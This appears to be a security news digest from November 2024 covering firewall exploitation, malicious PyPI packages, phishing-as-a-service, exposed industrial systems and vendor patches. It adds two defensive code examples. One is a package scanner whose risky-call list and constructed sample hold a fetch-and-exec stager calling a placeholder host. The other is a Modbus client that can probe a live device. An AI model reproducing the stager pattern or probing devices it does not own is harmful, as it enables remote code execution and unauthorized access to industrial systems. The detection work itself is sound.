1000s of Palo Alto Networks firewalls hijacked as miscreants exploit critical hole

November 22, 2024 at 04:31PM Attackers exploited two recently patched PAN-OS vulnerabilities in the management web interface of Palo Alto Networks firewalls, CVE-2024-0012 (authentication bypass) and CVE-2024-9474 (privilege escalation); chained, they give unauthenticated remote code execution with root privileges on exposed devices. Around 2,000 firewalls were observed compromised at the peak, a count that later fell to roughly 800. The intruders dropped web shells, backdoors and cryptocurrency miners. Palo Alto Networks continues to describe the number of affected systems as "limited".

Going Beyond Secure by Demand

November 22, 2024 at 12:39PM In June 2017, A.P. Møller – Maersk was hit by NotPetya, the destructive wiper malware deployed against Ukraine and attributed to Russia, which spread worldwide and caused an estimated $10 billion in damage across all victims; Maersk's own losses were around $300 million. CISA's recent Secure by Demand guidance urges software buyers to go beyond questionnaires and SBOMs and require independent validation and thorough analysis of the software they procure.

APT-K-47 Uses Hajj-Themed Lures to Deliver Advanced Asyncshell Malware

November 22, 2024 at 12:17PM The threat actor Mysterious Elephant, also tracked as APT-K-47, has been using an improved version of its Asyncshell malware in recent attacks on Pakistani entities. The group relies on Hajj-themed phishing lures to deliver malicious files, and the campaign shows a steady evolution of its tooling and tradecraft since 2023.

PyPI Attack: ChatGPT, Claude Impersonators Deliver JarkaStealer via Python Libraries

November 22, 2024 at 01:58AM Researchers found two malicious packages on PyPI that posed as API clients for OpenAI's ChatGPT and Anthropic's Claude and delivered the JarkaStealer information stealer. Uploaded in November 2023, they had accumulated 1,748 and 1,826 downloads respectively before removal. The case illustrates the supply-chain risk of pulling unvetted open-source components into development environments; both packages have been taken down.
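A cheap pre-install check a practitioner can run on a downloaded package is to parse its Python sources and flag the combination that a stager like the one above needs: fetch something from the network, decode it, and execute it. The block below is an added example, not the article's or the researchers' tooling, and it does not reproduce the real malicious packages; the two sample "packages" are constructed inline, and `example.invalid` is a placeholder host.

```python
"""Pre-install static vetting of a Python package's sources.

Added example (not the article's or PyPI's tooling). Name-based matching of
risky calls is deliberately simple: it catches careless stagers, not
determined obfuscation (aliased imports, getattr tricks, string building).
"""
import ast
from dataclasses import dataclass

# Dotted call names that rarely belong in a library claiming to wrap a chat API,
# grouped by the role they would play in a download-and-execute stager.
RISKY_CALLS = {
    "exec": "execute", "eval": "execute", "os.system": "execute",
    "os.popen": "execute", "subprocess.Popen": "execute",
    "subprocess.run": "execute", "subprocess.call": "execute",
    "urllib.request.urlopen": "fetch", "urllib.request.urlretrieve": "fetch",
    "requests.get": "fetch", "http.client.HTTPSConnection": "fetch",
    "base64.b64decode": "decode", "zlib.decompress": "decode",
    "marshal.loads": "decode",
}


@dataclass
class Finding:
    path: str
    line: int
    call: str
    category: str


def _dotted_name(node):
    """Render the callee of an ast.Call as 'pkg.mod.func', or None if dynamic."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # e.g. a call on the result of another call


def scan_source(path, source):
    """Return findings for one Python file; unparseable files are findings too."""
    try:
        tree = ast.parse(source, filename=path)
    except SyntaxError:
        return [Finding(path, 0, "<unparseable>", "unparseable")]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in RISKY_CALLS:
                findings.append(Finding(path, node.lineno, name, RISKY_CALLS[name]))
        elif (isinstance(node, ast.Constant) and isinstance(node.value, str)
              and len(node.value) > 200 and " " not in node.value):
            # Long space-free literals are how embedded base64 payloads look.
            findings.append(Finding(path, node.lineno, "<opaque literal>", "payload"))
    return findings


def vet_package(files):
    """files maps relative path -> source text. Returns (verdict, findings).

    'block'  : fetch + execute seen anywhere in the package, or unparseable code
    'review' : some risky calls, but not the full stager pattern
    'allow'  : nothing flagged
    """
    findings = [f for p, s in files.items() if p.endswith(".py")
                for f in scan_source(p, s)]
    categories = {f.category for f in findings}
    if "unparseable" in categories or {"fetch", "execute"} <= categories:
        return "block", findings
    if categories:
        return "review", findings
    return "allow", findings


# Constructed samples (not real package contents).
BENIGN_CLIENT = {
    "chatclient/__init__.py": (
        "import json\nimport urllib.request\n\n"
        "def ask(prompt):\n"
        "    req = urllib.request.Request('https://api.example.invalid/v1',\n"
        "                                 data=json.dumps({'p': prompt}).encode())\n"
        "    return urllib.request.urlopen(req).read()\n"
    ),
}
STAGER_CLIENT = {
    "chat_wrapper/__init__.py": (
        "import base64, urllib.request\n\n"
        "def _boot():\n"
        "    blob = urllib.request.urlopen('https://example.invalid/stage').read()\n"
        "    exec(base64.b64decode(blob))\n\n"
        "_boot()\n"
    ),
}

if __name__ == "__main__":
    for label, pkg in (("benign", BENIGN_CLIENT), ("stager", STAGER_CLIENT)):
        verdict, found = vet_package(pkg)
        print(label, verdict, [(f.path, f.line, f.call) for f in found])
```

A genuine API client will usually earn a "review" verdict because it legitimately talks to the network; the point is that "fetch" plus "execute" in an `__init__.py` that runs at import time is the stager shape and should stop the install until a human reads the code.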

Microsoft disrupts ONNX phishing-as-a-service infrastructure

November 21, 2024 at 12:08PM Microsoft's Digital Crimes Unit, acting on a civil court order with the Linux Foundation's LF Projects (owner of the ONNX trademark) as co-plaintiff, seized 240 domains used by ONNX, a phishing-as-a-service platform whose operator had been selling phishing kits since 2017. ONNX was among the most widely used kits in the first half of 2024; its adversary-in-the-middle pages were built to capture credentials and two-factor authentication codes. Operations halted after the operator's identity was exposed.

Over 145,000 Industrial Control Systems Across 175 Countries Found Exposed Online

November 21, 2024 at 06:11AM New research finds more than 145,000 internet-exposed Industrial Control System (ICS) services in 175 countries, with the United States accounting for the largest share. Much of the exposure is over legacy protocols such as Modbus that carry no authentication or encryption, so anyone who can reach the port can read and write process data. Attacks that deliberately target ICS remain rare but are increasing, which makes inventorying and removing this exposure a priority for critical-infrastructure operators.
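To see why an exposed Modbus/TCP port matters, it helps to look at what a complete request is: a 7-byte MBAP header and a 5-byte PDU, with no session setup and no credential anywhere. The block below is an added example, not code from the research above; it builds a Read Holding Registers request, parses normal and exception responses, and can probe a host you are authorized to test. The sample frames are constructed inline.

```python
"""Minimal Modbus/TCP client pieces (added example, not the research's tooling).

Modbus/TCP ADU = MBAP header (transaction id, protocol id 0, length, unit id)
followed by the PDU (function code + data). Nothing authenticates the sender.
"""
import socket
import struct

READ_HOLDING_REGISTERS = 0x03
MAX_ADU = 260  # largest Modbus/TCP frame


def build_read_holding_registers(transaction_id, unit_id, start, count):
    """Return the 12-byte ADU for function 0x03 reading `count` registers."""
    if not 1 <= count <= 125:
        raise ValueError("Modbus allows 1..125 registers per read")
    pdu = struct.pack(">BHH", READ_HOLDING_REGISTERS, start, count)
    # MBAP length field counts unit id + PDU.
    mbap = struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id)
    return mbap + pdu


def parse_response(adu):
    """Parse a function-0x03 response (or a Modbus exception) into a dict."""
    if len(adu) < 9:
        raise ValueError("short frame")
    tid, proto, length, unit, fcode = struct.unpack(">HHHBB", adu[:8])
    if proto != 0:
        raise ValueError("protocol id %d is not Modbus/TCP" % proto)
    if length != len(adu) - 6:
        raise ValueError("MBAP length %d does not match frame" % length)
    if fcode & 0x80:  # exception: function code with high bit set, 1 byte code
        return {"transaction_id": tid, "unit_id": unit,
                "function": fcode & 0x7F, "exception": adu[8], "registers": None}
    if fcode != READ_HOLDING_REGISTERS:
        raise ValueError("unexpected function code 0x%02x" % fcode)
    byte_count = adu[8]
    if byte_count % 2 or byte_count != len(adu) - 9:
        raise ValueError("bad byte count")
    regs = list(struct.unpack(">%dH" % (byte_count // 2), adu[9:9 + byte_count]))
    return {"transaction_id": tid, "unit_id": unit, "function": fcode,
            "exception": None, "registers": regs}


def probe(host, port=502, unit_id=1, timeout=3.0):
    """Read two holding registers from a device you are authorized to test.

    Any answer, including a Modbus exception, proves an unauthenticated
    Modbus endpoint is reachable from wherever this runs.
    """
    request = build_read_holding_registers(1, unit_id, 0, 2)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        return parse_response(sock.recv(MAX_ADU))


# Constructed frames for offline use: a normal reply with registers 10 and 20,
# and an exception reply with code 2 (illegal data address).
SAMPLE_OK = bytes.fromhex("000100000007010304000a0014")
SAMPLE_EXCEPTION = bytes.fromhex("000100000003018302")

if __name__ == "__main__":
    print(build_read_holding_registers(1, 1, 0, 2).hex())
    print(parse_response(SAMPLE_OK))
    print(parse_response(SAMPLE_EXCEPTION))
```

Run `probe()` only against equipment you own or are authorized to assess; the same twelve bytes sent by anyone else on the internet get the same answer, which is the whole problem the exposure numbers describe.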

‘Water Barghest’ Sells Hijacked IoT Devices for Proxy Botnet Misuse

November 20, 2024 at 09:39AM The cybercriminal group "Water Barghest" exploits vulnerabilities in internet-facing IoT devices to build proxy botnets and has compromised more than 20,000 devices so far. Using automated scanning and exploitation scripts together with the Ngioweb malware, the group lists the infected devices for sale on a residential proxy marketplace, often within minutes of compromise. The operation shows how quickly unpatched IoT devices are monetized and why they need the same patching and exposure management as any other asset.

China-linked group abuses Fortinet 0-day with post-exploit VPN-credential stealer

November 19, 2024 at 06:11PM A China-linked threat actor that Volexity tracks as BrazenBamboo is exploiting an unpatched zero-day in Fortinet's FortiClient VPN client for Windows: the client leaves the user's VPN credentials in process memory after authentication, and the actor's DeepData post-exploitation tool reads them out. Volexity reported the flaw to Fortinet in July 2024, and no fix had been released at the time of writing. DeepData is a modular framework capable of broader data theft beyond VPN credentials.

About the security content of iOS 18.1.1 and iPadOS 18.1.1 – Apple Support

November 19, 2024 at 01:54PM Apple released iOS 18.1.1 and iPadOS 18.1.1 on November 19, 2024 to fix CVE-2024-44308, a JavaScriptCore bug allowing arbitrary code execution from maliciously crafted web content, and CVE-2024-44309, a WebKit cookie-management issue leading to cross-site scripting. Apple says both may have been actively exploited on Intel-based Mac systems; the same fixes shipped for macOS, Safari and visionOS.

About the security content of iOS 17.7.2 and iPadOS 17.7.2 – Apple Support

November 19, 2024 at 01:54PM The same two vulnerabilities, CVE-2024-44308 (JavaScriptCore, arbitrary code execution) and CVE-2024-44309 (WebKit, cross-site scripting), reported as actively exploited on Intel-based Macs, are fixed for older devices in iOS 17.7.2 and iPadOS 17.7.2. The update is available for iPhone XS and later and for several iPad models, including iPad Air 3rd generation and later.